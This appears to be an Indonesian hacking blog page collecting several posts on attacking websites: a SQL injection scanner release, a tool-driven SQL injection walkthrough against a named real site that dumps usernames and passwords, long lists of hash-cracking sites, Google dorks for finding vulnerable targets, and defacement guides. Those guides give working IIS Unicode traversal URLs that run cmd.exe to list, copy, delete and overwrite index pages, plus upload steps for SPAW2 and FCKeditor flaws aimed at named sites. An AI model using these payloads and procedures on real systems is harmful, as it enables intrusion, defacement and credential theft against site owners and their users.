<$BlogItemTitle$> <data:blog.pageTitle/> <data:blog.pageTitle/> Be A CheateR ?

XCode SQLI Vulnurable Scanner + Google Engine

Masih Ingat dengan Reiluke Exploit Scanner? saya yakin banyak yang sudah pernah menggunakannya karena sudah pernah penulis bahas di forum XCode - Yogyafree dan beberapa dari pembaca pasti bertanya "mengapa saat ini tool tersebut tidak bisa digunakan lagi atau tidak memunculkan hasil pencarian dari dork?". Kira kira ini mungkin bisa menjawab rasa penasaran rekan-rekan.

Setelah penulis bedah tool Reiluke Exploit Scanner, ternyata tool ini tidak mencari langsung dork yang kita isi ke google tapi melalui http://blackle.com/. Blackle adalah website yang menggunakan source Google untuk menampilkan hasil pencarian dan beberapa waktu yang lalu Blackle.com di-block oleh Google sehingga pencarian menjadi kosong. Dan setelah beberapa waktu kemudian, pemilik website tersebut menambahkan /cse?cx= ke source script web Blackle sehingga web menjadi normal kembali.

Lalu apa hubungannya dengan reiluke? Tool ini sepertinya tidak diupdate lagi oleh pembuatnya dan Reiluke masih memanfaatkan script lama Blackle yang saat ini sudah diubah oleh pihak Blackle sendiri. akibatnya Reiluke Exploit Scanner tidak bisa lagi menampilkan hasil Dorking. Yep.. gambaran sederhananya adalah misalnya Reiluke mengirimkan perintah ke blackle yang semula dari Http://www.google.com/search?= sedangkan saat ini Blackle sudah mengubah scriptnya menjadi http://www.google.com/cse?cx= .

Penulis mencoba membuat sebuah Tool XCode SQLI Vulnurable Scanner + Google Engine yang prinsip kerjanya hampir sama dengan Reiluke Exploit Scanner.Setelah download, ekstrak semua filenya dan jalankan XCodeSQLiScanner.exe, Tool ini akan mengumpulkan Link dari Dork yang anda masukkan kemudian menampilkan listnya. setelah selesai menampilkan List, arahkan mouse pada salah satu list di Google results dan Klik Inject With Parameter. Tool ini akan mengirimkan parameter injeksi ke SQL web seperti ' - *. Jika Web tersebut memiliki bug SQL Injection maka di status akan muncul : www.target.com?blabla.php?=1234 : SQLi Vulnurable.

Mungkin masih banyak kekurangan atau Bug yang belum diketahui oleh penulis. Tapi setidaknya tool ini bisa mempermudah anda untuk mencari target.

Semoga Berguna

================================================== ==============
Credits:

Code name : .::XCode SQLI Vulnurable Scanner::.
Description : - SQLI Vulnurable Hunter with Google Engine -
Compiler : Microsoft Visual Basic 6.0
Author : poni
System : Windows 95, 98, XP, Vista, 7
Size : 718 kb
Update : I`m not sure where will i put it. Just
check the sites below
http://www.xcode.or.id
http://ferdianelli.wordpress.com
================================================== ==============
XCode SQLI Vulnurable Scanner help you to gather the dorks
Link from Google. then you may check the results if its
Vulnurable to exploit with SQL commands
================================================== ===============

EOF
Always With US BeaCheater

Label: , ,


Read more!

SQL Injection With Reiluke SQLi Helper v27





ok langsung aja gan

skrg ane punya target sqli

TARGET --> http://www.dootalk.com/content/showarticle.php?ID=61


nah skrg buka tools reiluke'a
skipp..
ok dah kebuka reiluke'a
sekarang masukann target dan langsung ---> inject
kaya di bawah gan
sep target dah masuk
setelah di inject keliatan dah database'a ..hehehhe
yoi target versi 5 gan
hmm..
qlo versi 4 se coba ane pake tools ini kaga bisa gan

wokeehh lanjuutt
stelah inject , klik get tadabase
hmm get database guna'a buat'a nyari tabel database'a gan
yoi contohnya kaya di bawah gan

truss lanjutkann ..
oia yg berwarna biru itu database'a gan
abis itu langsung klik get tables gan
hmm
sebelum klik get tables tandain dulu database gan
ok kaya gini

weww
keliatan dah table name'a ..hehhehe
wokehh
di dalam tabel name itu ada tabel users
kerenn yahh nih toolss cuma klik2 bisa ngeliat langsung tabell user'a
lanjjuut gan
setelah dapat dapat tabel user'a skarang nyari kolom'a
hmmm
cari kolom'a sama aja si gan sama cari tabel gan
sepp klik tabel kolom'a skrg
kaya gini gan
weww
makin keren aja dah nih tools ..hahaha
bisa ngeliat user ID & password sekarang gan ..wkwkwkwk

wokeh trakhir tinggal dump buat nyari user id & password'a gan
langsunng aja gan
sep dah keliatan user ID & password'a
sekarang tinggal di hash dah password'a
ni koleksi hash gw gan , dipilih dipilih..hahahhhahahha
credit : md search
MD4, MD5, SHA1
Code
http://www.milw0rm.com/cracker/
http://www.plain-text.info/add/
http://www.securitystats.com/tools/hashcrack.php
http://www.passcrack.spb.ru/
http://gdataonline.com/seekhash.php
http://www.md5-brute.com/
http://www.md5encryption.com/
http://www.insidepro.com/hashes.php?lang=rus
http://www.cirt.net/cgi-bin/passwd.pl
http://passcracking.ru
http://www.hashchecker.com/?_sls=add_hash
http://www.tydal.nu/category/
http://md5.dustinfineout.com/
http://www.md5-db.com/
http://www.md5hashes.com/
http://sha1search.com/
http://md5.xpzone.de/
http://www.csthis.com/md5/
http://md5.benramsey.com/
http://www.md5this.com/Cr*ck-it-/index.php
http://hackerscity.free.fr/
http://ice.breaker.free.fr/
http://md5search.deerme.org/
http://www.md5decrypter.com/
http://securitydb.org/cracker/
http://plain-text.info/index/
http://www.tmto.org/?category=main&page=home
http://md5.geeks.li/
http://hashreverse.com/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://md5crack.it-helpnet.de/index.php?op=add
https://astalavista.net/index.php?
http://md5search.uk.to/

MD5:
http://md5.sh4ka.fr
http://74.52.200.226/~b4ck/passhash/index.php
http://www.tmto.org/
http://md5.rednoize.com
http://nz.md5.crysm.net
http://us.md5.crysm.net
http://www.xmd5.org
http://gdataonline.com
http://www.hashchecker.com
http://passcracking.ru
http://www.milw0rm.com/md5
http://plain-text.info
http://www.securitystats.com/tools/hashcrack.php
http://www.schwett.com/md5/ - Does Norwegian words too
http://passcrack.spb.ru/
http://shm.pl/md5/
http://www.und0it.com/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://md5.geeks.li/
http://www.hashreverse.com/
http://www.cmd5.com/english.aspx
http://www.md5.altervista.org/
http://md5.overclock.ch/biz/index.php?p=md5crack&l=en
http://alimamed.pp.ru/md5/ (for those who can't read russian: put your md5 in the second box)
http://md5crack.it-helpnet.de/index.php?op=add
http://cijfer.hua.fi/
http://shm.hard-core.pl/md5/
http://www.mmkey.com/md5/HOME.ASP
http://www.thepanicroom.org/index.php?view=cracker
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/
http://www.securitydb.org/cracker/
http://passwordsecuritycenter.com/in...roducts_ id=7
http://0ptix.co.nr/md5
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com
http://www.pldsecurity.de/forum/md5.php
http://www.xeons.net/genesis/
http://hackerscity.free.fr/
http://bisix.cogia.net/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.jock-security.com/md5_database/?page=Cr*ck
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.blackfiresecurity.com/tools/md5lib.php
http://www.md5-db.com/index.php

MD4:
http://www.securitystats.com/tools/hashcrack.php
http://rainbowtables.net/services/results.php
http://rainbowcrack.com/

SHA1:
http://passcrack.spb.ru/
http://www.hashreverse.com/
http://rainbowcrack.com/
http://www.md5encryption.com/
http://www.shalookup.com/
http://md5.rednoize.com/
http://c4p-sl0ck.dyndns.org/cracker.php
http://www.tmto.org/
http://linardy.com/md5.php
http://www.gdataonline.com/seekhash.php
https://www.w4ck1ng.com/cracker/
http://search.cpan.org/~blwood/Digest-MD5-Reverse-1.3/
http://www.hashchecker.com/index.php?_sls=search_hash
http://www.rainbowcrack-online.com/
http://schwett.com/md5/
http://www.md5.org.cn/index_en.htm
http://www.xmd5.org/index_en.htm
http://nz.md5.crysm.net/
http://us.md5.crysm.net/
http://gdataonline.com/seekhash.php
http://passcracking.ru/
http://shm.pl/md5/
http://www.neeao.com/md5/
http://md5.benramsey.com/
http://www.md5decrypt.com/
http://md5.khrone.pl/
http://www.csthis.com/md5/index.php
http://www.md5decrypter.com/
http://www.md5encryption.com/
http://www.md5database.net/
http://md5.xpzone.de/
http://www.hashreverse.com/
http://alimamed.pp.ru/md5/
http://md5crack.it-helpnet.de/index.php?op=add
http://shm.hard-core.pl/md5/
http://rainbowcrack.com/
http://passwordsecuritycenter.com/index ... ducts_id=7
https://www.astalavista.net/?cmd=rainbowtables
http://ice.breaker.free.fr/
http://www.md5this.com/
http://hackerscity.free.fr/
http://md5.allfact.info/
http://bokehman.com/cracker/
http://www.tydal.nu/article/md5-Cr*ck/
http://passcracking.com/
http://ivdb.org/search/md5/
http://md5.netsons.org/
http://md5.c.la/
http://www.md5-db.com/index.php
http://md5.idiobase.de/
http://md5search.deerme.org/
http://sha1search.com/
oia mau tools reiluke'a bisa di unduh/donlot di mari:
Download
password'a reiluke :
www.reiluke.i.ph
hmm..
inget jangan ke tagihan pake tools gan
ntr ga maju2 lagi qlo pake tools
Sumber
Always With US BeaCheater

Label: ,


Read more!

Mencari Target With SQL Scanner

kali ini saya akan share tutorial tentang mencari target dengan google SQL injection scanner.

Banyak yang bertanya2 "om gimana sih cari target ? "om ajarin cari target sih ?
dan "om om... dst dsbb dll. Kemudian saya jawab. simple kok mas, tinggal buka google terus masukin dork nya, trs cari2 deh.

Oh, gitu ya om ? tp kemaren saya liat temen saya dapetnya cepet banget gmn ya om ? ajarin saya dong om ?
saya mau belajar SQL Injection nih dari tadi ga dapet korban yang vuln

Kemudian saya jawab lagi. "Baik kisanak, saya akan mengajarkan anda. karena anda mau berusaha. LEST GO!


1. Siapkan dulu sql injection scannernya. silahkan menuju ke tekape: http://tool.suramz.com/scanner.php
2. Kemudian masukan dorknya. dork bisa anda dapatkan ditoko2 terdekat seperti ditoko ini: http://suramz.com/suram/dork.txt

3. lalu, pilih salah satu dork yang anda suka. misalnya: inurl:news.php?id=
4. Setelah itu, Masukan dorknya dikotak hitam input! yang ada bacaan = inurl:.php?=id+site:am
5. Terus yang terakhir klik GASAK !!
6. Tunggu beberapa saat..... waiiting is boringting

7. Nah jika anda menemukan site2 yang warnanya ijo yang ada tulisan <-- maho detected (: berarti situs itu vuln dan bisa diinjek kalau anda menemukan kata2 <-- suram mas bro :'( berarti itu tidak bisa 8. Gimana mudah bukan ? semua orang bisa kok melakukannya. cuma karna belom tau aja Terus gimana om abis itu ? hayaaahh, tinggal masukin ke tool havij aja kok repot2 jika memang kamu serius mau belajar sql injection step by step belajar lah manual. tanpa menggunakan tool. karna nanti dengan sendirinya kamu bisa tau fungsi2 penginjectkan sql injection hehehhe
oke sekian dulu tutorial cupu dari saya. jika ada salah2 kata. maklum NEWBIE om
Sumber
Always With US BeaCheater

Label: ,


Read more!

Langkah Sederhana Buat Deface With CGI Bug

Langkah 1 : Mencari target

Mencari target dapat dilakukan dengan berbagai cara hal ini tergantung kreativitas dan sarana yang dimiliki, dalam hal ini bisa berbentuk script IRC, scanner. Sebagai dasar mengetahui OS yang digunakan server suatu site dapat diketahui dengan mencarinya pada situs http://www.netcraft.com/

Langkah 2 : Unicode

Setelah target didapat maka digunakan Unicode. Unicode itu sendiri penulis juga tidak terlalu mengetahui secara mendetail, tapi pada dasarnya Unicode menggunakan bahasa ASCII. Server yang menggunakan OS NT dengan IIS sendiri mempunyai bug yang bisa ditembus dengan Unicode dalam hal ini bila server itu belum dipatch. Unicode yang berhasil ditemukan untuk memasuki server NT sudah banyak. Dan yang bisa dicoba sebagai berikut:

http://target/_vti_bin/..%c0%af../.....exe?/c+dir+c:\
http://target/scripts/..%c0%af../..%...exe?/c+dir+c:\
http://target/msadc/..%c0%af../..%c0...exe?/c+dir+c:\
http://target/cgi-bin/..%c0%af../..%...exe?/c+dir+c:\
http://target/scripts/..%255c..%255c...exe?/c+dir+c:\
Bila Unicode tersebut berhasil maka akan dapat dilihat tampilan seperti berikut:

Directory of c:\
06/03/01 09:59a (DIR) InetPub
08/08/01 06:14p (DIR) WINNT

Langkah 3 :Mencari halaman depan

Saat membuka situs tersebut pada browser, kita pasti akan melihat tampilan muka dari site tersebut, perlu diperhatikan adalah file tampilan muka tersebut apa? biasanya antara lain: index.htm, index.html, default.htm, default.html. Kemudian dengan mengunakan Unicode tersebut kita mencari file tersebut letaknya dimana, biasanya di C:\inetpub\wwwroot (hal ini belum tentu). untuk mencari file tersebut dapat digunakan perintah:

/c+dir/s+c:\index.htm

Hal ini berarti perintah mencari file index.htm di dalam drive C
Untuk melihat apakah file index.htm tersebut adalah yang digunakan pada halaman depan, dipergunakan perintah :

/c+type+c:\direktory dan nama file, contoh : /c+type+c:\inetpub\wwwroot\index.htm

Setelah anda menemukan file index.htm tersebut, maka sebaiknya anda copy dulu, hal ini agar tindakan Deface kita tidak terlalu merugikan Administrator dari server situs tersebut. Sehingga nantinya Admin tersebut mempunyai backup dari file index.
perintah copy itu sendiri adalah:

/c+copy+c:\

contoh untuk pencopyan adalah:

/c+copy+c:\inetpub\wwwroot\index.htm backupindex.htm

untuk mempermudah pekerjaan dapat dilakukan pencopyan file cmd.exe yg berada di direktory c:/winnt/system32 dengan menggunakan nama anda, seperti :

/c+copy+c:\winnt\system32\cmd.exe+c:\deface.exe

hal ini berarti anda mencopy file cmd.exe ke dir c dgn nama deface.exe, sehingga untuk perintah2 selanjutnya tidak memerlukan /winnt/system32/cmd.exe?/ tapi cukup /deface.exe?/



Langkah 4 : Meng-Copy file index.htm

echo dalam dos berarti anda membuat file maka bila file index.htm yg asli anda echo berarti anda timpa dengan file index anda. Untuk perintahnya adalah:

/deface.exe?/c+echo+"deface+was+here"+>+c:\inetpub\wwwroot\inde x.htm

sehingga tampilan site depan telah terganti dengan tulisan
deface was here
Code:
Catatan:

Hal ini berlaku bila file index.htm tersebut dapat diecho, karena sebagian server membatasi direktory root dengan atribut read only, sehingga perintah echo index.htm akan menghasilkan :
Access Denied
Untuk membuat deface anda menjadi lebih bagus, dapat digunakan bahasa HTML dan ASCII
perintah-perintah lain :

membuat direktory = /c+mkdir+c:\
merubah nama file = /c+ren+c:\file
menghapus file = /c+del+c:\file
menghapus file Read-Only = /c+del+/R+c:\file

Always With US BeaCheater

Label: ,


Read more!

Deface Spaw Upload Vulnerably !

Ok bro,langsung saja ke materi ;) ikuti langkah-langkah berikut ini :



Dalam trik ini kita bisa memakai dork di bawah ini :
[inurl:"spaw2/dialogs/" ] dan [ inurl:"spaw2/uploads/files/" ]

Pertama kita cari target dengan memasukkan salah satu dork diatas di mesin pencari (google)



Jika telah dapat target , misalkan http://www.situstarget.com/admin/spaw2/uploads/files/SC.pdf
Ganti spaw2/uploads/files/SC.pdf dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2〈=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files maka akan muncul tampilan halaman/ form buat upload File.
Ganti lokasi penyimpanan / directory jadi files

Jika sudah , silahkan tekan Browse dan cari design deface kamu
Upload Deh File kamu.........

Apabila Proses upload telah selesai , maka akan terlihat file kamu.Untuk mengetahui lokasi file kamu klik file yang baru kamu upload, lihat disebelah kanan, ada link download file.


Klik link tersebut. maka akan terlihat file hasil deface'an kamu. Contoh : http://www.situstarget.com/admin/spaw2/uploads/files/Roni.html

sumber
Always With US BeaCheater

Label:


Read more!

Deface Web Mudah Dengan Web Folder

Kita mungkin pernah melihat halaman yang terkena aksi jahil terhadap situs tertentu oleh para defacer.
Lalu di dalam hati akan bertanya-tanya bagaimana cara melakukan itu??.
Mungkin kamu pernah membaca artikel tentang cara men-deface website dengan menggunakan teknik XSS, SQLi, LFI, RFI dll.
Namun percayalah, selain teknik tersebut masih ada teknik lain yang jauh lebih sederhana semudah copy paste file.

Bagaimana caranya??, yaitu dengan menggunakan web folder yang disediakan oleh OS Windows sendiri.
Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan server IIS 5.0/6.0 .

Lalu bagaimana cara mengetahui bahwa target kita menggunakan server IIS?
Mudah saja, silakan buka netcraft.com dan masukkan target kita ke textbox yang tersedia, maka akan kita dapatkan informasi website tersebut, termasuk OS dan server yang digunakan.
Jika kamu ingin mendapatkan target secara acak bisa menggunakan google dork dengan menggunakan keyword allinurl:*.asp , allinurl:*.aspx dan sebagainya.
OK, langsung kita mulai saja tutorialnya.

1. Buka My Computer lalu lihat icon web folder, lalu klik 2x icon web folder tersebut (Win 98/ME/2000).
Jika kamu menggunakan windows XP secara default tidak akan menemukan folder tersebut di My Computer, tapi kamu bisa membuat secara manual dengan membuat shortcut baru.
Berikut langkahnya :
- Klik kanan pada desktop, kemudian pilih New -> Shortcut .
- Maka akan ada popup yang meminta untuk memasukkan lokasi tujuan, lalu kamu masukkan alamat dibawah ini :

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

- Jika sudah silakan klik Next -> Next -> Finish.
- Jika shortcut nya sudah terbentuk, lalu klik 2x pada shortcut tersebut.
2. Jika kamu sudah berhasil membuka web folder tersebut kemudian klik kanan lalu pilih New – Web Folder
3. Lalu akan muncul popup yang meminta untuk memasukkan alamat tujuan. Sebagai contoh kamu masukkan http://www.xiongxian.info sebagai target.

4. Kemudian klik Next dan tunggu sampai prosesnya selesai, lama tidaknya proses tergantung koneksi internetmu.

5. Buka folder yang sudah terbentuk, nama folder biasanya mengambil dari nama domain, jika domainnya adalah http://www.xiongxian.info, maka nama foldernya juga http://www.xiongxian.info.
6. Copy paste sebuah file html ke dalam web folder yang telah kamu buat ke folder www.xiongxian.info.

7. Jika proses copy paste selesai, sebagai contoh jika nama file kamu adalah “test.html” maka cara melihatnya adalah dengan membuka browser dan mengetikkan alamat http://www.xiongxian.info/test.html .
Always With US BeaCheater

Label:


Read more!

Tutor Singkat Deface dengan txt,

Tutorial singkat deface with *.txt

[+] exploit
http://site/[patch]/fckeditor/editor/filemanager/connectors/test.html

OK kali ini saya akan memberikan tutorial deface paling gampang yang baru saya temukan di tanggal 5 janury 2011 

Sebenranya banyak cara deface.. apa lagi php nuke sangat banyak bug nya
Ga ada SS karma ini sangat gampang.. 

“Just Deface”

=======================
[+] langkah pertama [+]
=======================

Langkah pertama yang hasrus kita lakukan seperti biasa juga..
Nnya dulu sama si google
Dork..

Inurl:Masukin dork
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site:.my
inurl:connectors/uploadtest.html site:.my :P

udah blom?
Heheh
OK seep.. lanjut..
Buka site nya..

Kali ini saya coba site
http://www.slfc.net.cn

=======================
[+] langkah ke dua [+]
=======================

OK lanjut..
Masukin exploitnya
Jadinya kayak gini
http://www.slfc.net.cn/php/FCKeditor/edi.../test.html

SS

=======================
[+] langkah ke tiga [+]
=======================

Nah, kalo udah muncul yang kayak gitu udah pada tau kan..?
Sama seperti tutor ecommerce
OK, pilih php,,
Pilih file defacean kita
Upload..
Kalo keluar kotak dialog bertuliskan “file uploade with no errors” berrti berhasil

========================
[+] langkah ke empat [+]
========================
Cari file uploadtan kita..
Klik get folder and files..

untuk contoh ini ada di
"/php/userfiles/file/"
jadinya
demo: http://localshost/php/userfiles/file/[file kamu]
ex : http://www.slfc.net.cn/php/userfiles/file/hn.txt
Nah.. sekarang lihat url file kita tadi,, seep..
But just deface..

NB: Mungkin ini masih bisa di kembangkkan lagi.. untuk upload shell dengan memanipulasi file.. tapi saya belum berhasil karna saya masih newbie
Always With US BeaCheater

Label:


Read more!